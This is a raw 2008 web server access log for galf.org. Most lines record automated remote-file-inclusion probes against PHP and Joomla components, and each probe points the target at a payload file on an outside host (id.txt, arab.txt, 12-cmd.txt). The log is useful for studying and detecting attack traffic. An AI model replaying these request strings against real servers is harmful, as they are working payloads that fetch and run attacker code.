89.111.176.57 - - [20/Apr/2008:19:41:57 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.47.219.34 - - [20/Apr/2008:19:42:01 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
78.47.219.34 - - [20/Apr/2008:19:42:01 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
78.47.219.34 - - [20/Apr/2008:19:42:01 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.111.176.57 - - [20/Apr/2008:19:42:12 -0700] "GET /logs/access_080317.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:13 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:13 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:14 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.47.219.34 - - [20/Apr/2008:19:42:14 -0700] "GET /logs/access_080317.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:14 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:15 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:15 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:17 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:17 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:17 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:22 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:42:23 -0700] "GET //errors.php?error=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:42:23 -0700] "GET //errors.php?error=http://www.sacredword.net/docs/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:42:23 -0700] "GET /logs//errors.php?error=http://www.sacredword.net/docs/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:42:23 -0700] "GET /logs//errors.php?error=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:23 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:42:25 -0700] "GET /logs/access_080114.log/errors.php/errors.php?error=http://www.sacredword.net/docs/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:42:26 -0700] "GET /errors.php/errors.php?error=http://www.sacredword.net/docs/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:26 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:42:26 -0700] "GET /logs/errors.php/errors.php?error=http://www.sacredword.net/docs/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:26 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:27 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:42:27 -0700] "GET /logs/access_080114.log/errors.php/errors.php?error=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:42:28 -0700] "GET /errors.php/errors.php?error=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:42:28 -0700] "GET /logs/errors.php/errors.php?error=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:30 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:30 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:31 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:34 -0700] "GET /logs/access_080317.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:34 -0700] "GET /logs/access_080317.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:35 -0700] "GET /logs/access_080317.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:39 -0700] "GET /logs/access_080317.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:43 -0700] "GET /logs/access_080317.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:42:47 -0700] "GET /logs/access_080317.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.77.27.142 - - [20/Apr/2008:19:44:11 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://g0tcha.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
96.52.36.19 - - [20/Apr/2008:19:44:15 -0700] "GET /logs/access_080113.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://it.geocities.com/bigli0np0wa/blpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
96.52.36.19 - - [20/Apr/2008:19:44:15 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://it.geocities.com/bigli0np0wa/blpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
96.52.36.19 - - [20/Apr/2008:19:44:15 -0700] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://it.geocities.com/bigli0np0wa/blpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.201.82.63 - - [20/Apr/2008:19:45:44 -0700] "GET /logs/access_080114.log//configuration.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:46:22 -0700] "GET /logs/access.log/errors.php/errors.php?error=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:46:22 -0700] "GET /logs/access.log//errors.php?error=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:46:23 -0700] "GET /logs/access.log//errors.php?error=http://www.sacredword.net/docs/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:46:23 -0700] "GET /logs/access.log/errors.php/errors.php?error=http://www.sacredword.net/docs/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.200.245.189 - - [20/Apr/2008:19:46:33 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.math-center.gr/components/com_facileforms/.log/rox.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
209.200.245.189 - - [20/Apr/2008:19:46:33 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.math-center.gr/components/com_facileforms/.log/rox.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
72.29.70.163 - - [20/Apr/2008:19:46:55 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.utviklingsstudier.org//modules/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
69.9.129.6 - - [20/Apr/2008:19:47:27 -0700] "GET /logs/access_070827.log/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [20/Apr/2008:19:47:27 -0700] "GET /logs/access_070827.log/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [20/Apr/2008:19:47:27 -0700] "GET /components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [20/Apr/2008:19:47:27 -0700] "GET /components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [20/Apr/2008:19:47:27 -0700] "GET /logs/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [20/Apr/2008:19:47:27 -0700] "GET /logs/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:47:38 -0700] "GET /logs/access_080114.log//errors.php?error=http://www.zinforma.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:47:38 -0700] "GET //errors.php?error=http://www.zinforma.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:47:39 -0700] "GET /logs//errors.php?error=http://www.zinforma.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.9.129.6 - - [20/Apr/2008:19:47:41 -0700] "GET /logs/access_071028.log/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [20/Apr/2008:19:47:41 -0700] "GET /logs/access_071028.log/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:47:47 -0700] "GET /logs/access_080114.log//errors.php?error=http://www.zinforma.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:47:47 -0700] "GET //errors.php?error=http://www.zinforma.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:47:47 -0700] "GET /logs//errors.php?error=http://www.zinforma.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.22.87 - - [20/Apr/2008:19:48:12 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.27.156 - - [20/Apr/2008:19:48:12 -0700] "GET /logs/access_071028.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:50:36 -0700] "GET /logs/access.log/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.90.30.31 - - [20/Apr/2008:19:50:37 -0700] "GET /logs/access.log/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:50:55 -0700] "GET /logs/access.log//errors.php?error=http://www.zinforma.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
148.244.247.47 - - [20/Apr/2008:19:50:55 -0700] "GET /logs/access.log//errors.php?error=http://www.zinforma.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.9.129.6 - - [20/Apr/2008:19:51:17 -0700] "GET /logs/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [20/Apr/2008:19:51:17 -0700] "GET /components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.47.219.34 - - [20/Apr/2008:19:52:24 -0700] "GET /logs/access_080114.log//errors.php?error=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
78.47.219.34 - - [20/Apr/2008:19:52:24 -0700] "GET //errors.php?error=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
78.47.219.34 - - [20/Apr/2008:19:52:24 -0700] "GET /logs//errors.php?error=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.230.71.1 - - [20/Apr/2008:19:54:15 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.230.71.1 - - [20/Apr/2008:19:54:16 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.230.71.1 - - [20/Apr/2008:19:54:16 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.86.84.169 - - [20/Apr/2008:19:54:17 -0700] "GET /logs//plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
200.230.71.1 - - [20/Apr/2008:19:54:17 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.86.84.169 - - [20/Apr/2008:19:54:17 -0700] "GET //plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
200.230.71.1 - - [20/Apr/2008:19:54:17 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.230.71.1 - - [20/Apr/2008:19:54:18 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.230.71.1 - - [20/Apr/2008:19:54:18 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.230.71.1 - - [20/Apr/2008:19:54:19 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.230.71.1 - - [20/Apr/2008:19:54:20 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.18.217 - - [20/Apr/2008:19:54:34 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.29.239 - - [20/Apr/2008:19:54:34 -0700] "GET /logs/?D=A HTTP/1.0" 200 7357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.230.71.1 - - [20/Apr/2008:19:54:51 -0700] "GET /logs/access_080317.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.230.71.1 - - [20/Apr/2008:19:54:51 -0700] "GET /logs/access_080317.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.230.71.1 - - [20/Apr/2008:19:54:53 -0700] "GET /logs/access_080317.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.47.219.34 - - [20/Apr/2008:19:56:11 -0700] "GET /logs/access.log//errors.php?error=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.31.198.126 - - [20/Apr/2008:19:56:19 -0700] "HEAD / HTTP/1.1" 200 0 "-" "-" "galf.org"
72.5.250.201 - - [20/Apr/2008:19:56:26 -0700] "GET /logs/access_080113.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.5.250.201 - - [20/Apr/2008:19:56:26 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.5.250.201 - - [20/Apr/2008:19:56:27 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
75.126.218.14 - - [20/Apr/2008:19:56:30 -0700] "GET /logs/access_080113.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.218.14 - - [20/Apr/2008:19:56:30 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.218.14 - - [20/Apr/2008:19:56:30 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
204.15.120.73 - - [20/Apr/2008:19:56:35 -0700] "GET /logs/access_080113.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.120.73 - - [20/Apr/2008:19:56:35 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.120.73 - - [20/Apr/2008:19:56:35 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.21.60 - - [20/Apr/2008:19:56:37 -0700] "GET /logs/access_080421.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.3.139.246 - - [20/Apr/2008:19:57:32 -0700] "GET //?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.65" "www.galf.org"
69.9.129.6 - - [20/Apr/2008:19:58:09 -0700] "GET /logs/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [20/Apr/2008:19:58:10 -0700] "GET /components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.70.163 - - [20/Apr/2008:19:58:54 -0700] "GET /logs/access_071231.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.utviklingsstudier.org//modules/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.29.70.163 - - [20/Apr/2008:19:58:54 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.utviklingsstudier.org//modules/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
200.230.71.1 - - [20/Apr/2008:19:58:58 -0700] "GET /logs/access.log/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.70.163 - - [20/Apr/2008:19:59:55 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.utviklingsstudier.org//modules/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
24.93.105.27 - - [20/Apr/2008:19:59:56 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.7.193.54 - - [20/Apr/2008:20:00:32 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.7.193.54 - - [20/Apr/2008:20:00:32 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
83.230.241.240 - - [20/Apr/2008:20:01:26 -0700] "GET /logs/access_080225.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
